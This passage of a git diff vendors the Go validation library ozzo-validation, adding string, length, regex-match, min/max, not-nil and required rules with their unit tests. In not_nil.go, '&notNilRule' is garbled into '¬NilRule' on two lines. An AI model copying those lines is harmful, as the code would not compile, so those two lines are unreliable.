validation.NewStringRule(govalidator.IsUUIDv3, "must be a valid UUID v3") + // UUIDv4 validates if a string is a valid version 4 UUID + UUIDv4 = validation.NewStringRule(govalidator.IsUUIDv4, "must be a valid UUID v4") + // UUIDv5 validates if a string is a valid version 5 UUID + UUIDv5 = validation.NewStringRule(govalidator.IsUUIDv5, "must be a valid UUID v5") + // UUID validates if a string is a valid UUID + UUID = validation.NewStringRule(govalidator.IsUUID, "must be a valid UUID") + // CreditCard validates if a string is a valid credit card number + CreditCard = validation.NewStringRule(govalidator.IsCreditCard, "must be a valid credit card number") + // ISBN10 validates if a string is an ISBN version 10 + ISBN10 = validation.NewStringRule(govalidator.IsISBN10, 
"must be a valid ISBN-10") + // ISBN13 validates if a string is an ISBN version 13 + ISBN13 = validation.NewStringRule(govalidator.IsISBN13, "must be a valid ISBN-13") + // ISBN validates if a string is an ISBN (either version 10 or 13) + ISBN = validation.NewStringRule(isISBN, "must be a valid ISBN") + // JSON validates if a string is in valid JSON format + JSON = validation.NewStringRule(govalidator.IsJSON, "must be in valid JSON format") + // ASCII validates if a string contains ASCII characters only + ASCII = validation.NewStringRule(govalidator.IsASCII, "must contain ASCII characters only") + // PrintableASCII validates if a string contains printable ASCII characters only + PrintableASCII = validation.NewStringRule(govalidator.IsPrintableASCII, "must contain printable ASCII characters only") + // Multibyte validates if a string contains multibyte characters + Multibyte = validation.NewStringRule(govalidator.IsMultibyte, "must contain multibyte characters") + // FullWidth validates if a string contains full-width characters + FullWidth = validation.NewStringRule(govalidator.IsFullWidth, "must contain full-width characters") + // HalfWidth validates if a string contains half-width characters + HalfWidth = validation.NewStringRule(govalidator.IsHalfWidth, "must contain half-width characters") + // VariableWidth validates if a string contains both full-width and half-width characters + VariableWidth = validation.NewStringRule(govalidator.IsVariableWidth, "must contain both full-width and half-width characters") + // Base64 validates if a string is encoded in Base64 + Base64 = validation.NewStringRule(govalidator.IsBase64, "must be encoded in Base64") + // DataURI validates if a string is a valid base64-encoded data URI + DataURI = validation.NewStringRule(govalidator.IsDataURI, "must be a Base64-encoded data URI") + // CountryCode2 validates if a string is a valid ISO3166 Alpha 2 country code + CountryCode2 = validation.NewStringRule(govalidator.IsISO3166Alpha2, 
"must be a valid two-letter country code") + // CountryCode3 validates if a string is a valid ISO3166 Alpha 3 country code + CountryCode3 = validation.NewStringRule(govalidator.IsISO3166Alpha3, "must be a valid three-letter country code") + // DialString validates if a string is a valid dial string that can be passed to Dial() + DialString = validation.NewStringRule(govalidator.IsDialString, "must be a valid dial string") + // MAC validates if a string is a MAC address + MAC = validation.NewStringRule(govalidator.IsMAC, "must be a valid MAC address") + // IP validates if a string is a valid IP address (either version 4 or 6) + IP = validation.NewStringRule(govalidator.IsIP, "must be a valid IP address") + // IPv4 validates if a string is a valid version 4 IP address + IPv4 = validation.NewStringRule(govalidator.IsIPv4, "must be a valid IPv4 address") + // IPv6 validates if a string is a valid version 6 IP address + IPv6 = validation.NewStringRule(govalidator.IsIPv6, "must be a valid IPv6 address") + // DNSName validates if a string is valid DNS name + DNSName = validation.NewStringRule(govalidator.IsDNSName, "must be a valid DNS name") + // Host validates if a string is a valid IP (both v4 and v6) or a valid DNS name + Host = validation.NewStringRule(govalidator.IsHost, "must be a valid IP address or DNS name") + // Port validates if a string is a valid port number + Port = validation.NewStringRule(govalidator.IsPort, "must be a valid port number") + // MongoID validates if a string is a valid Mongo ID + MongoID = validation.NewStringRule(govalidator.IsMongoID, "must be a valid hex-encoded MongoDB ObjectId") + // Latitude validates if a string is a valid latitude + Latitude = validation.NewStringRule(govalidator.IsLatitude, "must be a valid latitude") + // Longitude validates if a string is a valid longitude + Longitude = validation.NewStringRule(govalidator.IsLongitude, "must be a valid longitude") + // SSN validates if a string is a social security number (SSN) + 
SSN = validation.NewStringRule(govalidator.IsSSN, "must be a valid social security number") + // Semver validates if a string is a valid semantic version + Semver = validation.NewStringRule(govalidator.IsSemver, "must be a valid semantic version") +) + +var ( + reDigit = regexp.MustCompile("^[0-9]+$") +) + +func isISBN(value string) bool { + return govalidator.IsISBN(value, 10) || govalidator.IsISBN(value, 13) +} + +func isDigit(value string) bool { + return reDigit.MatchString(value) +} + +func isUTFNumeric(value string) bool { + for _, c := range value { + if unicode.IsNumber(c) == false { + return false + } + } + return true +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go b/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go new file mode 100644 index 0000000000..7b332bbbf0 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go @@ -0,0 +1,94 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package is + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/stretchr/testify/assert" +) + +func TestAll(t *testing.T) { + tests := []struct { + tag string + rule validation.Rule + valid, invalid string + err string + }{ + {"Email", Email, "test@example.com", "example.com", "must be a valid email address"}, + {"URL", URL, "http://example.com", "examplecom", "must be a valid URL"}, + {"RequestURL", RequestURL, "http://example.com", "examplecom", "must be a valid request URL"}, + {"RequestURI", RequestURI, "http://example.com", "examplecom", "must be a valid request URI"}, + {"Alpha", Alpha, "abcd", "ab12", "must contain English letters only"}, + {"Digit", Digit, "123", "12ab", "must contain digits only"}, + {"Alphanumeric", Alphanumeric, "abc123", "abc.123", "must contain English letters and digits only"}, + {"UTFLetter", UTFLetter, "abc", "123", "must contain unicode letter characters only"}, + {"UTFDigit", UTFDigit, "123", "abc", "must contain unicode decimal digits only"}, + {"UTFNumeric", UTFNumeric, "123", "abc.123", "must contain unicode number characters only"}, + {"UTFLetterNumeric", UTFLetterNumeric, "abc123", "abc.123", "must contain unicode letters and numbers only"}, + {"LowerCase", LowerCase, "abc", "Abc", "must be in lower case"}, + {"UpperCase", UpperCase, "ABC", "ABc", "must be in upper case"}, + {"IP", IP, "74.125.19.99", "74.125.19.999", "must be a valid IP address"}, + {"IPv4", IPv4, "74.125.19.99", "2001:4860:0:2001::68", "must be a valid IPv4 address"}, + {"IPv6", IPv6, "2001:4860:0:2001::68", "74.125.19.99", "must be a valid IPv6 address"}, + {"MAC", MAC, "0123.4567.89ab", "74.125.19.99", "must be a valid MAC address"}, + {"DNSName", DNSName, "example.com", "abc%", "must be a valid DNS name"}, + {"Host", Host, "example.com", "abc%", "must be a valid IP address or DNS name"}, + {"Port", Port, "123", "99999", "must be a valid port number"}, + {"Latitude", Latitude, "23.123", "100", "must be a valid latitude"}, + 
{"Longitude", Longitude, "123.123", "abc", "must be a valid longitude"}, + {"SSN", SSN, "100-00-1000", "100-0001000", "must be a valid social security number"}, + {"Semver", Semver, "1.0.0", "1.0.0.0", "must be a valid semantic version"}, + {"ISBN", ISBN, "1-61729-085-8", "1-61729-085-81", "must be a valid ISBN"}, + {"ISBN10", ISBN10, "1-61729-085-8", "1-61729-085-81", "must be a valid ISBN-10"}, + {"ISBN13", ISBN13, "978-4-87311-368-5", "978-4-87311-368-a", "must be a valid ISBN-13"}, + {"UUID", UUID, "a987fbc9-4bed-3078-cf07-9141ba07c9f1", "a987fbc9-4bed-3078-cf07-9141ba07c9f3a", "must be a valid UUID"}, + {"UUIDv3", UUIDv3, "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "b987fbc9-4bed-4078-cf07-9141ba07c9f3", "must be a valid UUID v3"}, + {"UUIDv4", UUIDv4, "57b73598-8764-4ad0-a76a-679bb6640eb1", "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "must be a valid UUID v4"}, + {"UUIDv5", UUIDv5, "987fbc97-4bed-5078-af07-9141ba07c9f3", "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "must be a valid UUID v5"}, + {"MongoID", MongoID, "507f1f77bcf86cd799439011", "507f1f77bcf86cd79943901", "must be a valid hex-encoded MongoDB ObjectId"}, + {"CreditCard", CreditCard, "375556917985515", "375556917985516", "must be a valid credit card number"}, + {"JSON", JSON, "[1, 2]", "[1, 2,]", "must be in valid JSON format"}, + {"ASCII", ASCII, "abc", "aabc", "must contain ASCII characters only"}, + {"PrintableASCII", PrintableASCII, "abc", "aabc", "must contain printable ASCII characters only"}, + {"CountryCode2", CountryCode2, "US", "XY", "must be a valid two-letter country code"}, + {"CountryCode3", CountryCode3, "USA", "XYZ", "must be a valid three-letter country code"}, + {"DialString", DialString, "localhost.local:1", "localhost.loc:100000", "must be a valid dial string"}, + {"DataURI", DataURI, "data:image/png;base64,TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdC4=", "image/gif;base64,U3VzcGVuZGlzc2UgbGVjdHVzIGxlbw==", "must be a Base64-encoded data URI"}, + {"Base64", 
Base64, "TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdC4=", "image", "must be encoded in Base64"}, + {"Multibyte", Multibyte, "abc", "abc", "must contain multibyte characters"}, + {"FullWidth", FullWidth, "3ー0", "abc", "must contain full-width characters"}, + {"HalfWidth", HalfWidth, "abc123い", "0011", "must contain half-width characters"}, + {"VariableWidth", VariableWidth, "3ー0123", "abc", "must contain both full-width and half-width characters"}, + {"Hexadecimal", Hexadecimal, "FEF", "FTF", "must be a valid hexadecimal number"}, + {"HexColor", HexColor, "F00", "FTF", "must be a valid hexadecimal color code"}, + {"RGBColor", RGBColor, "rgb(100, 200, 1)", "abc", "must be a valid RGB color code"}, + {"Int", Int, "100", "1.1", "must be an integer number"}, + {"Float", Float, "1.1", "a.1", "must be a floating point number"}, + {"VariableWidth", VariableWidth, "", "", ""}, + } + + for _, test := range tests { + err := test.rule.Validate("") + assert.Nil(t, err, test.tag) + err = test.rule.Validate(test.valid) + assert.Nil(t, err, test.tag) + err = test.rule.Validate(&test.valid) + assert.Nil(t, err, test.tag) + err = test.rule.Validate(test.invalid) + assertError(t, test.err, err, test.tag) + err = test.rule.Validate(&test.invalid) + assertError(t, test.err, err, test.tag) + } +} + +func assertError(t *testing.T, expected string, err error, tag string) { + if expected == "" { + assert.Nil(t, err, tag) + } else if assert.NotNil(t, err, tag) { + assert.Equal(t, expected, err.Error(), tag) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/length.go b/vendor/github.com/go-ozzo/ozzo-validation/length.go new file mode 100644 index 0000000000..752df45d5e --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/length.go @@ -0,0 +1,77 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "errors" + "fmt" + "unicode/utf8" +) + +// Length returns a validation rule that checks if a value's length is within the specified range. +// If max is 0, it means there is no upper bound for the length. +// This rule should only be used for validating strings, slices, maps, and arrays. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func Length(min, max int) *lengthRule { + message := "the value must be empty" + if min == 0 && max > 0 { + message = fmt.Sprintf("the length must be no more than %v", max) + } else if min > 0 && max == 0 { + message = fmt.Sprintf("the length must be no less than %v", min) + } else if min > 0 && max > 0 { + message = fmt.Sprintf("the length must be between %v and %v", min, max) + } + return &lengthRule{ + min: min, + max: max, + message: message, + } +} + +// RuneLength returns a validation rule that checks if a string's rune length is within the specified range. +// If max is 0, it means there is no upper bound for the length. +// This rule should only be used for validating strings, slices, maps, and arrays. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +// If the value being validated is not a string, the rule works the same as Length. +func RuneLength(min, max int) *lengthRule { + r := Length(min, max) + r.rune = true + return r +} + +type lengthRule struct { + min, max int + message string + rune bool +} + +// Validate checks if the given value is valid or not. 
+func (v *lengthRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + var ( + l int + err error + ) + if s, ok := value.(string); ok && v.rune { + l = utf8.RuneCountInString(s) + } else if l, err = LengthOfValue(value); err != nil { + return err + } + + if v.min > 0 && l < v.min || v.max > 0 && l > v.max { + return errors.New(v.message) + } + return nil +} + +// Error sets the error message for the rule. +func (v *lengthRule) Error(message string) *lengthRule { + v.message = message + return v +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/length_test.go b/vendor/github.com/go-ozzo/ozzo-validation/length_test.go new file mode 100644 index 0000000000..5eda7317cc --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/length_test.go @@ -0,0 +1,90 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "database/sql" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestLength(t *testing.T) { + var v *string + tests := []struct { + tag string + min, max int + value interface{} + err string + }{ + {"t1", 2, 4, "abc", ""}, + {"t2", 2, 4, "", ""}, + {"t3", 2, 4, "abcdf", "the length must be between 2 and 4"}, + {"t4", 0, 4, "ab", ""}, + {"t5", 0, 4, "abcde", "the length must be no more than 4"}, + {"t6", 2, 0, "ab", ""}, + {"t7", 2, 0, "a", "the length must be no less than 2"}, + {"t8", 2, 0, v, ""}, + {"t9", 2, 0, 123, "cannot get the length of int"}, + {"t10", 2, 4, sql.NullString{String: "abc", Valid: true}, ""}, + {"t11", 2, 4, sql.NullString{String: "", Valid: true}, ""}, + {"t12", 2, 4, &sql.NullString{String: "abc", Valid: true}, ""}, + } + + for _, test := range tests { + r := Length(test.min, test.max) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestRuneLength(t *testing.T) { + var v *string + tests := []struct { + tag string + min, max int + value interface{} + err string + }{ + {"t1", 2, 4, "abc", ""}, + {"t1.1", 2, 3, "💥💥", ""}, + {"t1.2", 2, 3, "💥💥💥", ""}, + {"t1.3", 2, 3, "💥", "the length must be between 2 and 3"}, + {"t1.4", 2, 3, "💥💥💥💥", "the length must be between 2 and 3"}, + {"t2", 2, 4, "", ""}, + {"t3", 2, 4, "abcdf", "the length must be between 2 and 4"}, + {"t4", 0, 4, "ab", ""}, + {"t5", 0, 4, "abcde", "the length must be no more than 4"}, + {"t6", 2, 0, "ab", ""}, + {"t7", 2, 0, "a", "the length must be no less than 2"}, + {"t8", 2, 0, v, ""}, + {"t9", 2, 0, 123, "cannot get the length of int"}, + {"t10", 2, 4, sql.NullString{String: "abc", Valid: true}, ""}, + {"t11", 2, 4, sql.NullString{String: "", Valid: true}, ""}, + {"t12", 2, 4, &sql.NullString{String: "abc", Valid: true}, ""}, + {"t13", 2, 3, &sql.NullString{String: "💥💥", Valid: true}, ""}, + {"t14", 2, 3, &sql.NullString{String: "💥", Valid: true}, "the length must be between 2 and 3"}, + } 
+ + for _, test := range tests { + r := RuneLength(test.min, test.max) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_lengthRule_Error(t *testing.T) { + r := Length(10, 20) + assert.Equal(t, "the length must be between 10 and 20", r.message) + + r = Length(0, 20) + assert.Equal(t, "the length must be no more than 20", r.message) + + r = Length(10, 0) + assert.Equal(t, "the length must be no less than 10", r.message) + + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/match.go b/vendor/github.com/go-ozzo/ozzo-validation/match.go new file mode 100644 index 0000000000..02aa4fb62c --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/match.go @@ -0,0 +1,47 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "regexp" +) + +// Match returns a validation rule that checks if a value matches the specified regular expression. +// This rule should only be used for validating strings and byte slices, or a validation error will be reported. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func Match(re *regexp.Regexp) *matchRule { + return &matchRule{ + re: re, + message: "must be in a valid format", + } +} + +type matchRule struct { + re *regexp.Regexp + message string +} + +// Validate checks if the given value is valid or not. +func (v *matchRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil { + return nil + } + + isString, str, isBytes, bs := StringOrBytes(value) + if isString && (str == "" || v.re.MatchString(str)) { + return nil + } else if isBytes && (len(bs) == 0 || v.re.Match(bs)) { + return nil + } + return errors.New(v.message) +} + +// Error sets the error message for the rule. 
+func (v *matchRule) Error(message string) *matchRule { + v.message = message + return v +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/match_test.go b/vendor/github.com/go-ozzo/ozzo-validation/match_test.go new file mode 100644 index 0000000000..98075e658a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/match_test.go @@ -0,0 +1,44 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "regexp" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestMatch(t *testing.T) { + var v2 *string + tests := []struct { + tag string + re string + value interface{} + err string + }{ + {"t1", "[a-z]+", "abc", ""}, + {"t2", "[a-z]+", "", ""}, + {"t3", "[a-z]+", v2, ""}, + {"t4", "[a-z]+", "123", "must be in a valid format"}, + {"t5", "[a-z]+", []byte("abc"), ""}, + {"t6", "[a-z]+", []byte("123"), "must be in a valid format"}, + {"t7", "[a-z]+", []byte(""), ""}, + {"t8", "[a-z]+", nil, ""}, + } + + for _, test := range tests { + r := Match(regexp.MustCompile(test.re)) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_matchRule_Error(t *testing.T) { + r := Match(regexp.MustCompile("[a-z]+")) + assert.Equal(t, "must be in a valid format", r.message) + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/minmax.go b/vendor/github.com/go-ozzo/ozzo-validation/minmax.go new file mode 100644 index 0000000000..952bd1c4fc --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/minmax.go @@ -0,0 +1,177 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "errors" + "fmt" + "reflect" + "time" +) + +type thresholdRule struct { + threshold interface{} + operator int + message string +} + +const ( + greaterThan = iota + greaterEqualThan + lessThan + lessEqualThan +) + +// Min is a validation rule that checks if a value is greater or equal than the specified value. +// By calling Exclusive, the rule will check if the value is strictly greater than the specified value. +// Note that the value being checked and the threshold value must be of the same type. +// Only int, uint, float and time.Time types are supported. +// An empty value is considered valid. Please use the Required rule to make sure a value is not empty. +func Min(min interface{}) *thresholdRule { + return &thresholdRule{ + threshold: min, + operator: greaterEqualThan, + message: fmt.Sprintf("must be no less than %v", min), + } +} + +// Max is a validation rule that checks if a value is less or equal than the specified value. +// By calling Exclusive, the rule will check if the value is strictly less than the specified value. +// Note that the value being checked and the threshold value must be of the same type. +// Only int, uint, float and time.Time types are supported. +// An empty value is considered valid. Please use the Required rule to make sure a value is not empty. +func Max(max interface{}) *thresholdRule { + return &thresholdRule{ + threshold: max, + operator: lessEqualThan, + message: fmt.Sprintf("must be no greater than %v", max), + } +} + +// Exclusive sets the comparison to exclude the boundary value. +func (r *thresholdRule) Exclusive() *thresholdRule { + if r.operator == greaterEqualThan { + r.operator = greaterThan + r.message = fmt.Sprintf("must be greater than %v", r.threshold) + } else if r.operator == lessEqualThan { + r.operator = lessThan + r.message = fmt.Sprintf("must be less than %v", r.threshold) + } + return r +} + +// Validate checks if the given value is valid or not. 
+func (r *thresholdRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + rv := reflect.ValueOf(r.threshold) + switch rv.Kind() { + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + v, err := ToInt(value) + if err != nil { + return err + } + if r.compareInt(rv.Int(), v) { + return nil + } + + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + v, err := ToUint(value) + if err != nil { + return err + } + if r.compareUint(rv.Uint(), v) { + return nil + } + + case reflect.Float32, reflect.Float64: + v, err := ToFloat(value) + if err != nil { + return err + } + if r.compareFloat(rv.Float(), v) { + return nil + } + + case reflect.Struct: + t, ok := r.threshold.(time.Time) + if !ok { + return fmt.Errorf("type not supported: %v", rv.Type()) + } + v, ok := value.(time.Time) + if !ok { + return fmt.Errorf("cannot convert %v to time.Time", reflect.TypeOf(value)) + } + if v.IsZero() || r.compareTime(t, v) { + return nil + } + + default: + return fmt.Errorf("type not supported: %v", rv.Type()) + } + + return errors.New(r.message) +} + +// Error sets the error message for the rule. 
+func (r *thresholdRule) Error(message string) *thresholdRule { + r.message = message + return r +} + +func (r *thresholdRule) compareInt(threshold, value int64) bool { + switch r.operator { + case greaterThan: + return value > threshold + case greaterEqualThan: + return value >= threshold + case lessThan: + return value < threshold + default: + return value <= threshold + } +} + +func (r *thresholdRule) compareUint(threshold, value uint64) bool { + switch r.operator { + case greaterThan: + return value > threshold + case greaterEqualThan: + return value >= threshold + case lessThan: + return value < threshold + default: + return value <= threshold + } +} + +func (r *thresholdRule) compareFloat(threshold, value float64) bool { + switch r.operator { + case greaterThan: + return value > threshold + case greaterEqualThan: + return value >= threshold + case lessThan: + return value < threshold + default: + return value <= threshold + } +} + +func (r *thresholdRule) compareTime(threshold, value time.Time) bool { + switch r.operator { + case greaterThan: + return value.After(threshold) + case greaterEqualThan: + return value.After(threshold) || value.Equal(threshold) + case lessThan: + return value.Before(threshold) + default: + return value.Before(threshold) || value.Equal(threshold) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go b/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go new file mode 100644 index 0000000000..562757f5d8 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go @@ -0,0 +1,137 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" + "time" +) + +func TestMin(t *testing.T) { + date0 := time.Time{} + date20000101 := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC) + date20001201 := time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC) + date20000601 := time.Date(2000, 6, 1, 0, 0, 0, 0, time.UTC) + + tests := []struct { + tag string + threshold interface{} + exclusive bool + value interface{} + err string + }{ + // int cases + {"t1.1", 1, false, 1, ""}, + {"t1.2", 1, false, 2, ""}, + {"t1.3", 1, false, -1, "must be no less than 1"}, + {"t1.4", 1, false, 0, ""}, + {"t1.5", 1, true, 1, "must be greater than 1"}, + {"t1.6", 1, false, "1", "cannot convert string to int64"}, + {"t1.7", "1", false, 1, "type not supported: string"}, + // uint cases + {"t2.1", uint(2), false, uint(2), ""}, + {"t2.2", uint(2), false, uint(3), ""}, + {"t2.3", uint(2), false, uint(1), "must be no less than 2"}, + {"t2.4", uint(2), false, uint(0), ""}, + {"t2.5", uint(2), true, uint(2), "must be greater than 2"}, + {"t2.6", uint(2), false, "1", "cannot convert string to uint64"}, + // float cases + {"t3.1", float64(2), false, float64(2), ""}, + {"t3.2", float64(2), false, float64(3), ""}, + {"t3.3", float64(2), false, float64(1), "must be no less than 2"}, + {"t3.4", float64(2), false, float64(0), ""}, + {"t3.5", float64(2), true, float64(2), "must be greater than 2"}, + {"t3.6", float64(2), false, "1", "cannot convert string to float64"}, + // Time cases + {"t4.1", date20000601, false, date20000601, ""}, + {"t4.2", date20000601, false, date20001201, ""}, + {"t4.3", date20000601, false, date20000101, "must be no less than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.4", date20000601, false, date0, ""}, + {"t4.5", date20000601, true, date20000601, "must be greater than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.6", date20000601, true, 1, "cannot convert int to time.Time"}, + {"t4.7", struct{}{}, false, 1, "type not supported: struct {}"}, + } + + for _, test 
:= range tests { + r := Min(test.threshold) + if test.exclusive { + r.Exclusive() + } + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestMinError(t *testing.T) { + r := Min(10) + assert.Equal(t, "must be no less than 10", r.message) + + r.Error("123") + assert.Equal(t, "123", r.message) +} + +func TestMax(t *testing.T) { + date0 := time.Time{} + date20000101 := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC) + date20001201 := time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC) + date20000601 := time.Date(2000, 6, 1, 0, 0, 0, 0, time.UTC) + + tests := []struct { + tag string + threshold interface{} + exclusive bool + value interface{} + err string + }{ + // int cases + {"t1.1", 2, false, 2, ""}, + {"t1.2", 2, false, 1, ""}, + {"t1.3", 2, false, 3, "must be no greater than 2"}, + {"t1.4", 2, false, 0, ""}, + {"t1.5", 2, true, 2, "must be less than 2"}, + {"t1.6", 2, false, "1", "cannot convert string to int64"}, + {"t1.7", "1", false, 1, "type not supported: string"}, + // uint cases + {"t2.1", uint(2), false, uint(2), ""}, + {"t2.2", uint(2), false, uint(1), ""}, + {"t2.3", uint(2), false, uint(3), "must be no greater than 2"}, + {"t2.4", uint(2), false, uint(0), ""}, + {"t2.5", uint(2), true, uint(2), "must be less than 2"}, + {"t2.6", uint(2), false, "1", "cannot convert string to uint64"}, + // float cases + {"t3.1", float64(2), false, float64(2), ""}, + {"t3.2", float64(2), false, float64(1), ""}, + {"t3.3", float64(2), false, float64(3), "must be no greater than 2"}, + {"t3.4", float64(2), false, float64(0), ""}, + {"t3.5", float64(2), true, float64(2), "must be less than 2"}, + {"t3.6", float64(2), false, "1", "cannot convert string to float64"}, + // Time cases + {"t4.1", date20000601, false, date20000601, ""}, + {"t4.2", date20000601, false, date20000101, ""}, + {"t4.3", date20000601, false, date20001201, "must be no greater than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.4", date20000601, false, date0, ""}, + {"t4.5", 
date20000601, true, date20000601, "must be less than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.6", date20000601, true, 1, "cannot convert int to time.Time"}, + } + + for _, test := range tests { + r := Max(test.threshold) + if test.exclusive { + r.Exclusive() + } + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestMaxError(t *testing.T) { + r := Max(10) + assert.Equal(t, "must be no greater than 10", r.message) + + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go b/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go new file mode 100644 index 0000000000..6cfca1204a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go @@ -0,0 +1,32 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import "errors" + +// NotNil is a validation rule that checks if a value is not nil. +// NotNil only handles types including interface, pointer, slice, and map. +// All other types are considered valid. +var NotNil = ¬NilRule{message: "is required"} + +type notNilRule struct { + message string +} + +// Validate checks if the given value is valid or not. +func (r *notNilRule) Validate(value interface{}) error { + _, isNil := Indirect(value) + if isNil { + return errors.New(r.message) + } + return nil +} + +// Error sets the error message for the rule. +func (r *notNilRule) Error(message string) *notNilRule { + return ¬NilRule{ + message: message, + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go b/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go new file mode 100644 index 0000000000..4821da531c --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go @@ -0,0 +1,50 @@ +// Copyright 2016 Qiang Xue. All rights reserved. 
+// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +type MyInterface interface { + Hello() +} + +func TestNotNil(t *testing.T) { + var v1 []int + var v2 map[string]int + var v3 *int + var v4 interface{} + var v5 MyInterface + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", v1, "is required"}, + {"t2", v2, "is required"}, + {"t3", v3, "is required"}, + {"t4", v4, "is required"}, + {"t5", v5, "is required"}, + {"t6", "", ""}, + {"t7", 0, ""}, + } + + for _, test := range tests { + r := NotNil + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_notNilRule_Error(t *testing.T) { + r := NotNil + assert.Equal(t, "is required", r.message) + r2 := r.Error("123") + assert.Equal(t, "is required", r.message) + assert.Equal(t, "123", r2.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/required.go b/vendor/github.com/go-ozzo/ozzo-validation/required.go new file mode 100644 index 0000000000..ef9558e025 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/required.go @@ -0,0 +1,42 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import "errors" + +// Required is a validation rule that checks if a value is not empty. +// A value is considered not empty if +// - integer, float: not zero +// - bool: true +// - string, array, slice, map: len() > 0 +// - interface, pointer: not nil and the referenced value is not empty +// - any other types +var Required = &requiredRule{message: "cannot be blank", skipNil: false} + +// NilOrNotEmpty checks if a value is a nil pointer or a value that is not empty. +// NilOrNotEmpty differs from Required in that it treats a nil pointer as valid. 
